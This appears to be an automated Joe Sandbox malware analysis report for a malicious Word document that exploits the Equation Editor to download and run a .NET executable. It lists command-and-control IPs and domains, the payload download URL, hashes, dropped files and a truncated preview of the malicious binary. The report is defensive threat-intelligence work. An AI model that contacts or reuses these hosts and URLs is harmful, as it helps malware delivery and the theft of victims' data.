http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp	false		high
http://www.sk.ee/juur/crl/0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.e-certchile.cl/html/productos/download/CPSv1	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	false		high
http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://duylfM.com	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sk.ee/cps/0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.valicert.com/1	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://193.239.147.103	poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.wellsfargo.com/certpolicy0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	poiuytrewsdfghjklmnbvcx.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false		high
http://www.comsign.co.il/cps0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.chambersign.org/cps/publicnotaryroot.html0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
193.239.147.103	unknown	Brunei Darussalam	35913	DEDIPATH-LLCUS	false
172.111.202.41	unknown	United States	39122	BLACKNIGHT-ASIE	true
198.54.122.60	unknown	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	345163
Start date:	27.01.2021
Start time:	19:28:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Pending Orders Statement -40064778.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@8/13@11/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 9.2% (good quality ratio 5.3%) Quality average: 49.5% Quality standard deviation: 44.1%
HCA Information:	Successful, ratio: 97% Number of executed functions: 34 Number of non-executed functions: 1
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42 Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:29:38	API Interceptor	40x Sleep call for process: EQNEDT32.EXE modified
19:29:40	API Interceptor	898x Sleep call for process: poiuytrewsdfghjklmnbvcx.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.239.147.103	SHIPPING DOCS.doc	Get hash	malicious	Browse	193.239.147.103/base/A8D4BE7F005361BFBD128FDF08D58189.html
	documenting.doc	Get hash	malicious	Browse	193.239.147.103/base/D6BA86F557F0B3BF28711AA5C7497D8B.html
	Overdue_invoices.exe	Get hash	malicious	Browse	193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
	SIT-10295.exe	Get hash	malicious	Browse	193.239.147.103/base/759EFD3939882C342360C054C0B0F139.html
	MT103_SWFT012621ONOMN.doc	Get hash	malicious	Browse	193.239.147.103/base/FF20D3DCE8649E687BDAC089AF53336F.html
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	193.239.147.103/base/ED373B21DE74B174904C90C4F88850ED.html
	SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exe	Get hash	malicious	Browse	193.239.147.103/base/817B8D2BFEA38CDAF771C594C8EDD2E5.html
	SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exe	Get hash	malicious	Browse	193.239.147.103/base/D11F9AABDFF0704F9266CD718DBD402A.html
	SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exe	Get hash	malicious	Browse	193.239.147.103/base/D1A437E767757AD4AED3D462BF223DC7.html
	Shipping Documents.doc	Get hash	malicious	Browse	193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
	8Aobnx1VRi.exe	Get hash	malicious	Browse	193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
	DSksIiT85D.exe	Get hash	malicious	Browse	193.239.147.103/base/84BABA4BCDFD79499D4EFDE97172FE7F.html
	SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exe	Get hash	malicious	Browse	193.239.147.103/base/4360BD50C79123B72BE98F9871724C8D.html
	Updated Invoice{swift..exe	Get hash	malicious	Browse	193.239.147.103/base/3815F0F23310F1653DD4231C92F53862.html
	mr kesh.exe	Get hash	malicious	Browse	193.239.147.103/base/B690B5BB2DC34BEDA854B2E34C821BF0.html
	SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exe	Get hash	malicious	Browse	193.239.147.103/base/AC74DA1A537FAA26238A4038BDCC34AA.html
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	193.239.147.103/base/A835403D21646D38831BEFB4AACEE40A.html
	SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exe	Get hash	malicious	Browse	193.239.147.103/base/CFA32E9D22202129AAEAB33745DD6268.html
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	193.239.147.103/base/8C0599C1B9B3E6070FB750C30A6E4DE5.html
	SecuriteInfo.com.Artemis326CF1417127.exe	Get hash	malicious	Browse	193.239.147.103/base/C153CE1CCAD2548C2547CF3FCE5D339E.html
172.111.202.41	documenting.doc	Get hash	malicious	Browse
198.54.122.60	documenting.doc	Get hash	malicious	Browse
	RFQ Tengco_270121.doc	Get hash	malicious	Browse
	74725794.exe	Get hash	malicious	Browse
	pickup receipt,DOC.exe	Get hash	malicious	Browse
	Pi_74725794.exe	Get hash	malicious	Browse
	74725794.exe	Get hash	malicious	Browse
	New FedEx paper work review.exe	Get hash	malicious	Browse
	New paper work document attached.exe	Get hash	malicious	Browse
	DHL_AWB_1928493383.exe	Get hash	malicious	Browse
	PGXPHWCclJQdkUDcrlQETWlRbmXQw.exe	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exe	Get hash	malicious	Browse
	gc2hl6HPAVH5h1p.exe	Get hash	malicious	Browse
	DHL7472579410110100.PDF.exe	Get hash	malicious	Browse
	PO-104_171220.exe	Get hash	malicious	Browse
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse
	EOI5670995098732.exe	Get hash	malicious	Browse
	INQUIRY- NET MACHINES-122020.doc	Get hash	malicious	Browse
	EE09TR0098654.exe	Get hash	malicious	Browse
	ENS003.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Inject4.6124.20146.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cybersng.duckdns.org	documenting.doc	Get hash	malicious	Browse	172.111.202.41
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	104.37.4.35
	BRANDCARE ORDER.doc	Get hash	malicious	Browse	104.37.4.35
	http://ng.openmicchallenge.com/zankuqw/Y29saW4ubWFjZG9uYWxkQGJyaXRpc2hnYXMuY28udWs=	Get hash	malicious	Browse	104.250.180.10
mail.privateemail.com	documenting.doc	Get hash	malicious	Browse	198.54.122.60
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	198.54.122.60
	74725794.exe	Get hash	malicious	Browse	198.54.122.60
	Enq No 34 22-01-2021.exe	Get hash	malicious	Browse	198.54.122.60
	pickup receipt,DOC.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Trojan.nm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.qm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exe	Get hash	malicious	Browse	198.54.122.60
	Pi_74725794.exe	Get hash	malicious	Browse	198.54.122.60
	74725794.exe	Get hash	malicious	Browse	198.54.122.60
	New FedEx paper work review.exe	Get hash	malicious	Browse	198.54.122.60
	New paper work document attached.exe	Get hash	malicious	Browse	198.54.122.60
	DHL_AWB_1928493383.exe	Get hash	malicious	Browse	198.54.122.60
	PGXPHWCclJQdkUDcrlQETWlRbmXQw.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exe	Get hash	malicious	Browse	198.54.122.60
	gc2hl6HPAVH5h1p.exe	Get hash	malicious	Browse	198.54.122.60

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DEDIPATH-LLCUS	SHIPPING DOCS.doc	Get hash	malicious	Browse	193.239.147.103
	documenting.doc	Get hash	malicious	Browse	193.239.147.103
	Overdue_invoices.exe	Get hash	malicious	Browse	193.239.147.103
	Tender documents_FOB_Offer_Printout.PDF.exe	Get hash	malicious	Browse	45.15.143.189
	SIT-10295.exe	Get hash	malicious	Browse	193.239.147.103
	MT103_SWFT012621ONOMN.doc	Get hash	malicious	Browse	193.239.147.103
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exe	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exe	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exe	Get hash	malicious	Browse	193.239.147.103
	Shipping Documents.doc	Get hash	malicious	Browse	193.239.147.103
	8Aobnx1VRi.exe	Get hash	malicious	Browse	193.239.147.103
	DSksIiT85D.exe	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exe	Get hash	malicious	Browse	193.239.147.103
	Updated Invoice{swift..exe	Get hash	malicious	Browse	193.239.147.103
	mr kesh.exe	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exe	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exe	Get hash	malicious	Browse	193.239.147.103
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	193.239.147.103
BLACKNIGHT-ASIE	documenting.doc	Get hash	malicious	Browse	172.111.202.41
	spptqzbEyNlEJvj.exe	Get hash	malicious	Browse	91.210.233.220
	Request a quote Mitsubishi Japan XN501.exe	Get hash	malicious	Browse	81.17.241.117
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	81.17.241.117
	cGLVytu1ps.exe	Get hash	malicious	Browse	78.153.213.7
	4wCFJMHdEJ.exe	Get hash	malicious	Browse	78.153.213.7
	mb10.exe	Get hash	malicious	Browse	78.153.210.4
	mb10.exe	Get hash	malicious	Browse	78.153.210.4
	https://99756260.us17.list-manage.com/pages/track/click?u=ae9ce42233ecb67da0142e610&id=4eb4fb4732/#YXJtYW5kby5jaGF2ZXpAb3prLmNvbQ==	Get hash	malicious	Browse	78.153.210.7
	emotet-1.doc	Get hash	malicious	Browse	46.22.132.72
	Emotet_7406.doc	Get hash	malicious	Browse	46.22.132.72
	Emotet_7406.doc	Get hash	malicious	Browse	46.22.132.72
	emotet.doc	Get hash	malicious	Browse	46.22.132.72
	Paypal.doc	Get hash	malicious	Browse	46.22.132.72
	Paypal.doc	Get hash	malicious	Browse	46.22.132.72
	emotet.doc	Get hash	malicious	Browse	46.22.132.72
	emotet.doc	Get hash	malicious	Browse	46.22.132.72
	960-27-621120-257 & 960-27-621120-969.doc	Get hash	malicious	Browse	46.22.132.72
	Rechnung.doc	Get hash	malicious	Browse	46.22.132.72
	Open invoices.doc	Get hash	malicious	Browse	46.22.132.72
NAMECHEAP-NETUS	documenting.doc	Get hash	malicious	Browse	198.54.122.60
	#B30COPY.htm	Get hash	malicious	Browse	198.54.115.249
	AE-808_RAJEN.exe	Get hash	malicious	Browse	68.65.122.156
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	198.54.122.60
	quote20210126.exe.exe	Get hash	malicious	Browse	198.54.117.215
	MV TAN BINH 135.pdf.exe	Get hash	malicious	Browse	198.54.116.236
	IMG_155710.doc	Get hash	malicious	Browse	199.192.18.134
	bXFjrxjRlb.exe	Get hash	malicious	Browse	198.54.117.215
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	199.192.21.36
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	199.192.21.36
	winlog(1).exe	Get hash	malicious	Browse	198.54.117.216
	Revise Bank Details_pdf.exe	Get hash	malicious	Browse	198.54.116.236
	SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exe	Get hash	malicious	Browse	198.187.31.7
	SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exe	Get hash	malicious	Browse	198.187.31.7
	Payment Swift Copy_USD 206,832,000.00.pdf.exe	Get hash	malicious	Browse	198.54.116.236
	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	198.54.117.244
	DSksIiT85D.exe	Get hash	malicious	Browse	199.188.200.97
	file.exe	Get hash	malicious	Browse	198.54.116.236
	Tebling_Resortsac_FILE-HP38XM.htm	Get hash	malicious	Browse	104.219.248.112
	file.exe	Get hash	malicious	Browse	198.54.116.236

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.078657124509345
Encrypted:	false
SSDEEP:	6:kKbzmbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:TT3kPlE99SNxAhUeo+aKt
MD5:	A520165884A1CB8BD99E95808D9CA131
SHA1:	0A36C41C3E673BF089B4C5CF1502119F7FBF9838
SHA-256:	7FCA5A7CDA786E74804A9575B9CCF004E858B5F91652B434C9C2D7FF36FA42EE
SHA-512:	5AD9B8368A31CEBF69B82D77B9E319E26F6D153F9B43B35C655F7CD318BCF579ACF5BA911C806C21BE934DB958B0396CA7E6160D76A4274A3AD6952958486E71
Malicious:	false
Reputation:	low
Preview:	p...... ............4...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	246784
Entropy (8bit):	5.925208163230513
Encrypted:	false
SSDEEP:	3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
MD5:	D0154FB70ABD786136AE9F68F285541C
SHA1:	42988286A1993959373A692AC455375B6AD2AE76
SHA-256:	E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
SHA-512:	8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
Malicious:	true
Reputation:	low
IE Cache URL:	http://cy.kl-re.com//power/bo/boobov.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..`................................. ........@.. ....................... ............`.....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..............................P ........................................................................................................................................................................r\..p(N........s.........r`..p.....sO.........r..p......%.r..p.%.r...p.%.r..p.(<....r..p......%.r..p.%.r...p.%.r...p.%.r..p.(<....r..p......%.r=f.p.%.r...p.%.r=f.p.%.r.g.p.(<...~~....:....(0...sg........~..... ....2rx..p.()...2r...p.().........(....~~....:....(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2658F6C0-C679-4D43-96D3-E7E6CC77C67B}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	1.1344146986492145
Encrypted:	false
SSDEEP:	6:wIgJ6FtSFxq6FtSFaHwNgREqAWlgFJA/jlll8vlw2FrA:XJwdwaQk5uFJAbuvq2ZA
MD5:	5D451C185B7D589A04AA6712177E0694
SHA1:	06592E243DD2C109AD226C5F703B6B33AA0ACCFE
SHA-256:	7D34E941188ACA030691224627FCE62CACE5C65FEC3DE81B0CE73AA74375E6CF
SHA-512:	CCAD871C8B2740851AE96A13AC8E5F7A02A91B5453EFC053C199FB72E4F514F16D0ED8D0E61BE86DC5942249BDACFF10FB564A8F2AE80B252F744099073AA4E1
Malicious:	false
Reputation:	low
Preview:	. . . . . . . . . .1.4.6.8.3.9.1.2._.4.0.6.1.9.1.6.4.0.6.1.9.1.6. . . . . . . ._.4.0.6.1.9.1.6.4.0.6.1.9.1.6.......................................=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cab232D.tmp Download File
Process:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar232E.tmp Download File
Process:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
File Type:	data
Category:	modified
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Pending Orders Statement -40064778.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
